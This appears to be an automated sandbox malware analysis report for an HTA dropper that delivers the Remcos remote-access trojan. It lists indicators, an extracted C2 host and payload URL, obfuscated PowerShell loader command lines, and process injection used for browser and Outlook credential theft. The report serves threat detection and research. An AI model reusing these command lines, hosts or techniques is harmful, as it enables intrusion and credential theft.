Analysis
- max time kernel: 147s
- max time network: 145s
- platform: windows10-2004_x64
- resource: win10v2004-20241007-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 16/12/2024, 06:16
Behavioral task behavioral1
- Sample: clearentirethingwithbestnoticetheeverythinggooodfrome.hta
- Resource: win7-20241010-en
Behavioral task behavioral2
- Sample: clearentirethingwithbestnoticetheeverythinggooodfrome.hta
- Resource: win10v2004-20241007-en
General
- Target: clearentirethingwithbestnoticetheeverythinggooodfrome.hta
- Size: 144KB
- MD5: 5215d83b478d7a718062863c5efbbeeb
- SHA1: 9ac735295a8b3bc10740d50669f6fa5c81ae10ce
- SHA256: af6c6b710e9a4c5e2d8b53642779548a4edcd528cd7e5714c6ac9d69f38efb80
- SHA512: b1ea72019653fa7858aa1b6ad1fa3fcf6974ade703be0edd55f891030706fc675425e5f1372dc3a61671dff5e40e6baceba019af60711cd65a248f7cecbca915
- SSDEEP: 768:t1EZFxaTOum2oum2M5KUJDVUKhCbGVf/AMF9woN83WkkA7MhrkK0IHj66666666l:tg
Malware Config
Extracted
https://res.cloudinary.com/dzvai86uh/image/upload/v1734050991/unxaooiykxfmw9pan4z1.jpg%20
Extracted: remcos
- RemoteHost: kelexrmcadmnnccupdated.duckdns.org:14646
- audio_folder: MicRecords
- audio_path: ApplicationPath
- audio_record_time: 5
- connect_delay: 0
- connect_interval: 1
- copy_file: remcos.exe
- copy_folder: Remcos
- delete_file: false
- hide_file: false
- hide_keylog_file: false
- install_flag: false
- keylog_crypt: false
- keylog_file: logs.dat
- keylog_flag: false
- keylog_folder: remcos
- mouse_option: false
- mutex: Rmc-B3IX49
- screenshot_crypt: false
- screenshot_flag: false
- screenshot_folder: Screenshots
- screenshot_path: %AppData%
- screenshot_time: 10
- take_screenshot_option: false
- take_screenshot_time: 5
Signatures

Remcos family

Detected Nirsoft tools 2 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
- resource: behavioral2/memory/4388-100-0x0000000000400000-0x0000000000424000-memory.dmp, yara_rule: Nirsoft
- resource: behavioral2/memory/1468-101-0x0000000000400000-0x0000000000478000-memory.dmp, yara_rule: Nirsoft

NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
- resource: behavioral2/memory/1468-101-0x0000000000400000-0x0000000000478000-memory.dmp, yara_rule: WebBrowserPassView

Blocklisted process makes network request 3 IoCs
- flow 13, pid 2212, powershell.exe
- flow 19, pid 516, powershell.exe
- flow 28, pid 516, powershell.exe

Evasion via Device Credential Deployment 2 IoCs
- pid 3668, cmd.exe
- pid 2212, powershell.exe

Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
- Key value queried: \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation, Process: mshta.exe
- Key value queried: \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation, Process: WScript.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
- Key opened: \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, Process: CasPol.exe

Unlabelled signature
- pid 516, powershell.exe

Suspicious use of SetThreadContext 4 IoCs
- PID 516 set thread context of 100; pid 516, powershell.exe, procid_target 104
- PID 100 set thread context of 1468; pid 100, CasPol.exe, procid_target 106
- PID 100 set thread context of 1888; pid 100, CasPol.exe, procid_target 107
- PID 100 set thread context of 4388; pid 100, CasPol.exe, procid_target 108

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Location Discovery: System Language Discovery 1 TTPs 11 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language, by 11 processes: mshta.exe, csc.exe, WScript.exe, powershell.exe, cmd.exe, powershell.exe, cvtres.exe, CasPol.exe, CasPol.exe, CasPol.exe, CasPol.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs
- pid 2212, powershell.exe (2 events)
- pid 516, powershell.exe (4 events)
- pid 4388, CasPol.exe (2 events)
- pid 1468, CasPol.exe (4 events)

Suspicious behavior: MapViewOfSection 3 IoCs
- pid 100, CasPol.exe (3 events)

Suspicious use of AdjustPrivilegeToken 3 IoCs
- Token: SeDebugPrivilege; pid 2212, powershell.exe
- Token: SeDebugPrivilege; pid 516, powershell.exe
- Token: SeDebugPrivilege; pid 4388, CasPol.exe

Suspicious use of WriteProcessMemory 43 IoCs
- PID 3456 wrote to memory of 3668; pid 3456, mshta.exe, procid_target 83 (3 events)
- PID 3668 wrote to memory of 2212; pid 3668, cmd.exe, procid_target 85 (3 events)
- PID 2212 wrote to memory of 2256; pid 2212, powershell.exe, procid_target 86 (3 events)
- PID 2256 wrote to memory of 460; pid 2256, csc.exe, procid_target 87 (3 events)
- PID 2212 wrote to memory of 3416; pid 2212, powershell.exe, procid_target 94 (3 events)
- PID 3416 wrote to memory of 516; pid 3416, WScript.exe, procid_target 95 (3 events)
- PID 516 wrote to memory of 1860; pid 516, powershell.exe, procid_target 103 (3 events)
- PID 516 wrote to memory of 100; pid 516, powershell.exe, procid_target 104 (10 events)
- PID 100 wrote to memory of 1468; pid 100, CasPol.exe, procid_target 106 (4 events)
- PID 100 wrote to memory of 1888; pid 100, CasPol.exe, procid_target 107 (4 events)
- PID 100 wrote to memory of 4388; pid 100, CasPol.exe, procid_target 108 (4 events)
Processes

- C:\Windows\SysWOW64\mshta.exe (PID 3456)
  Command line: C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\clearentirethingwithbestnoticetheeverythinggooodfrome.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
  Signatures: Checks computer location settings; System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory

  - C:\Windows\SysWOW64\cmd.exe (PID 3668)
    Command line: "C:\Windows\system32\cmd.exe" "/C PoWERSHELL.Exe -Ex byPasS -nOp -w 1 -c DEvIceCRedeNtiAldEPLOYmeNt ; InVokE-exPREsSiOn($(inVoKe-EXPResSiOn('[SysteM.Text.encOding]'+[chaR]58+[CHAr]0x3A+'UtF8.GeTsTriNg([SYSTEm.convERT]'+[cHar]58+[chAR]58+'FRoMbaSE64stRinG('+[CHaR]0x22+'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'+[ChAR]0X22+'))')))"
    Signatures: Evasion via Device Credential Deployment; System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory

    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 2212)
      Command line: PoWERSHELL.Exe -Ex byPasS -nOp -w 1 -c DEvIceCRedeNtiAldEPLOYmeNt ; InVokE-exPREsSiOn($(inVoKe-EXPResSiOn('[SysteM.Text.encOding]'+[chaR]58+[CHAr]0x3A+'UtF8.GeTsTriNg([SYSTEm.convERT]'+[cHar]58+[chAR]58+'FRoMbaSE64stRinG('+[CHaR]0x22+'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'+[ChAR]0X22+'))')))"
      Signatures: Blocklisted process makes network request; Evasion via Device Credential Deployment; System Location Discovery: System Language Discovery; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory

      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe (PID 2256)
        Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kkaveuq3\kkaveuq3.cmdline"
        Signatures: System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory

        - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe (PID 460)
          Command line: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB18D.tmp" "c:\Users\Admin\AppData\Local\Temp\kkaveuq3\CSC37B425BA3BE412D84F0FF6FAD129D.TMP"
          Signatures: System Location Discovery: System Language Discovery

      - C:\Windows\SysWOW64\WScript.exe (PID 3416)
        Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\simplegreatfeatureswithnicespeakingthingsentirelifegoi.vbS"
        Signatures: Checks computer location settings; System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory

        - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 516)
          Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $capellmeister = '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';$hypoxanthine = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($capellmeister));Invoke-Expression $hypoxanthine
          Signatures: Blocklisted process makes network request; Command and Scripting Interpreter: PowerShell; Suspicious use of SetThreadContext; System Location Discovery: System Language Discovery; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory

          - C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe (PID 1860)
            Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"

          - C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe (PID 100)
            Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
            Signatures: Suspicious use of SetThreadContext; System Location Discovery: System Language Discovery; Suspicious behavior: MapViewOfSection; Suspicious use of WriteProcessMemory

            - C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe (PID 1468)
              Command line: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\poutjkmzsfufhshgdnkxf"
              Signatures: System Location Discovery: System Language Discovery; Suspicious behavior: EnumeratesProcesses

            - C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe (PID 1888)
              Command line: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\aqzmkdxtgnmssyvkmywziifc"
              Signatures: Accesses Microsoft Outlook accounts; System Location Discovery: System Language Discovery

            - C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe (PID 4388)
              Command line: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\kkfelvquuwexunrovijstvatpca"
              Signatures: System Location Discovery: System Language Discovery; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
Downloads